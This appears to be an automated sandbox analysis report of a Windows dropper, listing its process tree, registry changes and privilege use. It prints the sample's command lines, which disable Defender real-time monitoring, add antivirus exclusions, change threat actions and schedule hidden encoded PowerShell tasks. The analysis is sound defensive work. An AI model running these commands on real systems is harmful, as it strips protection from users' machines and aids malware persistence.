\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-a7-9c-5d-1a-03\WpadDecisionReason = "1" ZbjsrWF.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ZbjsrWF.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-a7-9c-5d-1a-03\WpadDecision = "0" ZbjsrWF.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-a7-9c-5d-1a-03\WpadDetectedUrl XzkMenS.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-a7-9c-5d-1a-03\WpadDecision = "0" XzkMenS.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" XzkMenS.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" ZbjsrWF.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" nJvUBDN.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{699017BE-42D6-4DAC-9A5F-C5B9345BADC5}\32-a7-9c-5d-1a-03 ZbjsrWF.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{699017BE-42D6-4DAC-9A5F-C5B9345BADC5} ZbjsrWF.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{699017BE-42D6-4DAC-9A5F-C5B9345BADC5}\WpadDecisionReason = "1" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings XzkMenS.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.EXEpowershell.exepowershell.exeXzkMenS.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEpowershell.exeZbjsrWF.exepowershell.exepowershell.exepid process 2692 powershell.exe 2692 powershell.exe 2692 powershell.exe 2164 powershell.exe 2136 powershell.exe 2136 powershell.exe 2136 powershell.exe 832 powershell.EXE 832 powershell.EXE 832 powershell.EXE 2200 powershell.EXE 2200 powershell.EXE 2200 powershell.EXE 2192 powershell.exe 2888 powershell.EXE 2888 powershell.EXE 2888 powershell.EXE 2492 powershell.exe 1244 powershell.exe 2492 powershell.exe 2492 powershell.exe 1244 powershell.exe 1244 powershell.exe 2904 XzkMenS.exe 2904 XzkMenS.exe 2904 XzkMenS.exe 2904 XzkMenS.exe 2904 XzkMenS.exe 2664 powershell.exe 2904 XzkMenS.exe 2904 XzkMenS.exe 2904 XzkMenS.exe 1440 powershell.exe 1432 powershell.EXE 1432 powershell.EXE 1432 powershell.EXE 2904 XzkMenS.exe 2904 XzkMenS.exe 2904 XzkMenS.exe 2244 powershell.EXE 2244 powershell.EXE 2244 powershell.EXE 1892 powershell.exe 1892 powershell.exe 1892 powershell.exe 1028 ZbjsrWF.exe 1028 ZbjsrWF.exe 1028 ZbjsrWF.exe 1028 ZbjsrWF.exe 1028 ZbjsrWF.exe 1028 ZbjsrWF.exe 1028 ZbjsrWF.exe 1028 ZbjsrWF.exe 912 powershell.exe 868 powershell.exe 2904 XzkMenS.exe 2904 XzkMenS.exe 2904 XzkMenS.exe 2904 XzkMenS.exe 2904 XzkMenS.exe 2904 XzkMenS.exe 1028 ZbjsrWF.exe 1028 ZbjsrWF.exe 1028 ZbjsrWF.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exeWMIC.exepowershell.exepowershell.EXEpowershell.EXEpowershell.exeWMIC.exepowershell.EXEpowershell.exepowershell.exepowershell.exeWMIC.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 2692 powershell.exe Token: SeDebugPrivilege 2164 powershell.exe Token: SeIncreaseQuotaPrivilege 2772 WMIC.exe Token: SeSecurityPrivilege 2772 WMIC.exe Token: SeTakeOwnershipPrivilege 2772 WMIC.exe Token: SeLoadDriverPrivilege 2772 WMIC.exe Token: SeSystemProfilePrivilege 2772 WMIC.exe Token: SeSystemtimePrivilege 2772 WMIC.exe Token: SeProfSingleProcessPrivilege 2772 WMIC.exe Token: SeIncBasePriorityPrivilege 2772 WMIC.exe Token: SeCreatePagefilePrivilege 2772 WMIC.exe Token: SeBackupPrivilege 2772 WMIC.exe Token: SeRestorePrivilege 2772 WMIC.exe Token: SeShutdownPrivilege 2772 WMIC.exe Token: SeDebugPrivilege 2772 WMIC.exe Token: SeSystemEnvironmentPrivilege 2772 WMIC.exe Token: SeRemoteShutdownPrivilege 2772 WMIC.exe Token: SeUndockPrivilege 2772 WMIC.exe Token: SeManageVolumePrivilege 2772 WMIC.exe Token: 33 2772 WMIC.exe Token: 34 2772 WMIC.exe Token: 35 2772 WMIC.exe Token: SeDebugPrivilege 2136 powershell.exe Token: SeDebugPrivilege 832 powershell.EXE Token: SeDebugPrivilege 2200 powershell.EXE Token: SeDebugPrivilege 2192 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2644 WMIC.exe Token: SeIncreaseQuotaPrivilege 2644 WMIC.exe Token: SeSecurityPrivilege 2644 WMIC.exe Token: SeTakeOwnershipPrivilege 2644 WMIC.exe Token: SeLoadDriverPrivilege 2644 WMIC.exe Token: SeSystemtimePrivilege 2644 WMIC.exe Token: SeBackupPrivilege 2644 WMIC.exe Token: SeRestorePrivilege 2644 WMIC.exe Token: SeShutdownPrivilege 2644 WMIC.exe Token: SeSystemEnvironmentPrivilege 2644 WMIC.exe Token: SeUndockPrivilege 2644 WMIC.exe Token: SeManageVolumePrivilege 2644 WMIC.exe Token: SeDebugPrivilege 2888 powershell.EXE Token: SeDebugPrivilege 2492 powershell.exe Token: SeDebugPrivilege 1244 powershell.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2412 WMIC.exe Token: SeIncreaseQuotaPrivilege 2412 WMIC.exe Token: SeSecurityPrivilege 2412 WMIC.exe Token: SeTakeOwnershipPrivilege 2412 WMIC.exe Token: SeLoadDriverPrivilege 2412 WMIC.exe Token: SeSystemtimePrivilege 2412 WMIC.exe Token: SeBackupPrivilege 2412 WMIC.exe Token: SeRestorePrivilege 2412 WMIC.exe Token: SeShutdownPrivilege 2412 WMIC.exe Token: SeSystemEnvironmentPrivilege 2412 WMIC.exe Token: SeUndockPrivilege 2412 WMIC.exe Token: SeManageVolumePrivilege 2412 WMIC.exe Token: SeDebugPrivilege 1440 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2484 WMIC.exe Token: SeIncreaseQuotaPrivilege 2484 WMIC.exe Token: SeSecurityPrivilege 2484 WMIC.exe Token: SeTakeOwnershipPrivilege 2484 WMIC.exe Token: SeLoadDriverPrivilege 2484 WMIC.exe Token: SeSystemtimePrivilege 2484 WMIC.exe Token: SeBackupPrivilege 2484 WMIC.exe Token: SeRestorePrivilege 2484 WMIC.exe Token: SeShutdownPrivilege 2484 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
98022e0a3770adaa832a90228c525f088cc6a8150acdf3acbfac20349b98b198.exeInstall.exeInstall.execmd.exeforfiles.execmd.exeforfiles.execmd.exedescription pid process target process PID 492 wrote to memory of 1532 492 98022e0a3770adaa832a90228c525f088cc6a8150acdf3acbfac20349b98b198.exe Install.exe PID 492 wrote to memory of 1532 492 98022e0a3770adaa832a90228c525f088cc6a8150acdf3acbfac20349b98b198.exe Install.exe PID 492 wrote to memory of 1532 492 98022e0a3770adaa832a90228c525f088cc6a8150acdf3acbfac20349b98b198.exe Install.exe PID 492 wrote to memory of 1532 492 98022e0a3770adaa832a90228c525f088cc6a8150acdf3acbfac20349b98b198.exe Install.exe PID 492 wrote to memory of 1532 492 98022e0a3770adaa832a90228c525f088cc6a8150acdf3acbfac20349b98b198.exe Install.exe PID 492 wrote to memory of 1532 492 98022e0a3770adaa832a90228c525f088cc6a8150acdf3acbfac20349b98b198.exe Install.exe PID 492 wrote to memory of 1532 492 98022e0a3770adaa832a90228c525f088cc6a8150acdf3acbfac20349b98b198.exe Install.exe PID 1532 wrote to memory of 2080 1532 Install.exe Install.exe PID 1532 wrote to memory of 2080 1532 Install.exe Install.exe PID 1532 wrote to memory of 2080 1532 Install.exe Install.exe PID 1532 wrote to memory of 2080 1532 Install.exe Install.exe PID 1532 wrote to memory of 2080 1532 Install.exe Install.exe PID 1532 wrote to memory of 2080 1532 Install.exe Install.exe PID 1532 wrote to memory of 2080 1532 Install.exe Install.exe PID 2080 wrote to memory of 2732 2080 Install.exe cmd.exe PID 2080 wrote to memory of 2732 2080 Install.exe cmd.exe PID 2080 wrote to memory of 2732 2080 Install.exe cmd.exe PID 2080 wrote to memory of 2732 2080 Install.exe cmd.exe PID 2080 wrote to memory of 2732 2080 Install.exe cmd.exe PID 2080 wrote to memory of 2732 2080 Install.exe cmd.exe PID 2080 wrote to memory of 2732 2080 Install.exe cmd.exe PID 2732 wrote to memory of 2712 2732 cmd.exe forfiles.exe PID 2732 wrote to memory of 2712 2732 cmd.exe forfiles.exe PID 2732 wrote to memory of 2712 2732 cmd.exe forfiles.exe PID 2732 wrote to memory of 2712 2732 cmd.exe forfiles.exe PID 2732 wrote to memory of 2712 2732 cmd.exe forfiles.exe PID 2732 wrote to memory of 2712 2732 cmd.exe forfiles.exe PID 2732 wrote to memory of 2712 2732 cmd.exe forfiles.exe PID 2712 wrote to memory of 2660 2712 forfiles.exe cmd.exe PID 2712 wrote to memory of 2660 2712 forfiles.exe cmd.exe PID 2712 wrote to memory of 2660 2712 forfiles.exe cmd.exe PID 2712 wrote to memory of 2660 2712 forfiles.exe cmd.exe PID 2712 wrote to memory of 2660 2712 forfiles.exe cmd.exe PID 2712 wrote to memory of 2660 2712 forfiles.exe cmd.exe PID 2712 wrote to memory of 2660 2712 forfiles.exe cmd.exe PID 2660 wrote to memory of 3048 2660 cmd.exe reg.exe PID 2660 wrote to memory of 3048 2660 cmd.exe reg.exe PID 2660 wrote to memory of 3048 2660 cmd.exe reg.exe PID 2660 wrote to memory of 3048 2660 cmd.exe reg.exe PID 2660 wrote to memory of 3048 2660 cmd.exe reg.exe PID 2660 wrote to memory of 3048 2660 cmd.exe reg.exe PID 2660 wrote to memory of 3048 2660 cmd.exe reg.exe PID 2732 wrote to memory of 1316 2732 cmd.exe forfiles.exe PID 2732 wrote to memory of 1316 2732 cmd.exe forfiles.exe PID 2732 wrote to memory of 1316 2732 cmd.exe forfiles.exe PID 2732 wrote to memory of 1316 2732 cmd.exe forfiles.exe PID 2732 wrote to memory of 1316 2732 cmd.exe forfiles.exe PID 2732 wrote to memory of 1316 2732 cmd.exe forfiles.exe PID 2732 wrote to memory of 1316 2732 cmd.exe forfiles.exe PID 1316 wrote to memory of 2348 1316 forfiles.exe cmd.exe PID 1316 wrote to memory of 2348 1316 forfiles.exe cmd.exe PID 1316 wrote to memory of 2348 1316 forfiles.exe cmd.exe PID 1316 wrote to memory of 2348 1316 forfiles.exe cmd.exe PID 1316 wrote to memory of 2348 1316 forfiles.exe cmd.exe PID 1316 wrote to memory of 2348 1316 forfiles.exe cmd.exe PID 1316 wrote to memory of 2348 1316 forfiles.exe cmd.exe PID 2348 wrote to memory of 2876 2348 cmd.exe reg.exe PID 2348 wrote to memory of 2876 2348 cmd.exe reg.exe PID 2348 wrote to memory of 2876 2348 cmd.exe reg.exe PID 2348 wrote to memory of 2876 2348 cmd.exe reg.exe PID 2348 wrote to memory of 2876 2348 cmd.exe reg.exe PID 2348 wrote to memory of 2876 2348 cmd.exe reg.exe PID 2348 wrote to memory of 2876 2348 cmd.exe reg.exe PID 2732 wrote to memory of 2628 2732 cmd.exe forfiles.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\98022e0a3770adaa832a90228c525f088cc6a8150acdf3acbfac20349b98b198.exe"C:\Users\Admin\AppData\Local\Temp\98022e0a3770adaa832a90228c525f088cc6a8150acdf3acbfac20349b98b198.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS1796.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS196A.tmp\Install.exe.\Install.exe /yubrdiddcqWv "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force8⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bGTnZQDECKwDuNSWyq" /SC once /ST 23:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT\dzNXoKKbKVNKsqo\nJvUBDN.exe\" FN /rVmdidZXJS 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bGTnZQDECKwDuNSWyq"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bGTnZQDECKwDuNSWyq5⤵
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bGTnZQDECKwDuNSWyq6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 6244⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\system32\taskeng.exetaskeng.exe {6496B362-9F7B-4532-BDE7-544E191766BD} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT\dzNXoKKbKVNKsqo\nJvUBDN.exeC:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT\dzNXoKKbKVNKsqo\nJvUBDN.exe FN /rVmdidZXJS 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gVEzcTjTn" /SC once /ST 09:05:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gVEzcTjTn"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gVEzcTjTn"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gTooiYnHb" /SC once /ST 05:09:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gTooiYnHb"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gTooiYnHb"3⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gLbKcqvTyliDAKYm" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gLbKcqvTyliDAKYm" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gLbKcqvTyliDAKYm" /t REG_DWORD /d 0 /reg:643⤵
-
